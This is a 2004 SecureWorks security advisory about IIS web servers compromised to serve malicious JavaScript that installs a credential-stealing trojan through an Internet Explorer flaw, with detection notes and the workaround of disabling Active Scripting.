Contact Us
IIS Server Compromises
- URL: http://www.secureworks.com/research/threats/iiscompromises
- Date: June 25, 2004
- Author: Joe Stewart
***IIS Server Compromises***
A number of sites are reporting malicious javascript code being appended to every page served by IIS. Some in the press are speculating that there is a new "zero-day" IIS vulnerability circulating. At this time SecureWorks has seen no evidence for a new vulnerability or worm. We have seen a relatively small number of sites reporting the code, so it is possible the sites were hacked manually or by the webmaster surfing using IE on the webserver box itself. There has been no increase in scanning for port 80 and there is no new exploit code being picked up by SecureWorks honeypots at this time.
The main exposure to this attack comes from users who surf to one of the infected sites using Internet Explorer. The malicious javascript surreptitiously installs a variant of the Berbew/Webber/Padodor trojan which can steal Ebay, Paypal and webmail account logins if the user visits those sites. If the user is running XP, they may also be shown fake popups that attempt to coerce credit card and PIN numbers from them.
SecureWorks' IDS and IPS platforms have signatures to detect the trojan activity as well as the IE exploit, so we will escalate any infections we detect to you. Currently there is no patch from Microsoft that will fix the vulnerability in IE; the workaround is to disable Active Scripting. Ordinarily it is recommended to enable Active Scripting for trusted sites only, but since the compromise could come from a trusted site, completely disabling Active Scripting in all external zones is the only completely safe action. This should be weighed against the total risk of the compromise, which is fairly low since the media coverage will probably force the trojan download site offline shortly. Another factor to consider is most desktop antivirus should be able to detect and remove the threat with updated virus definitions. Manual removal of the trojan is also fairly trivial; two registry edits and a reboot.
More information concerning remediation is available from Microsoft at: http://www.microsoft.com/security/incident/download_ject.mspx
More detailed information is available through the SecureWorks Threat Intelligence release. This advisory is brought to you by SecureWorks' research team. Threat Intelligence provides security teams with vulnerability alerts and early warnings to emerging threats tailored to your environment.
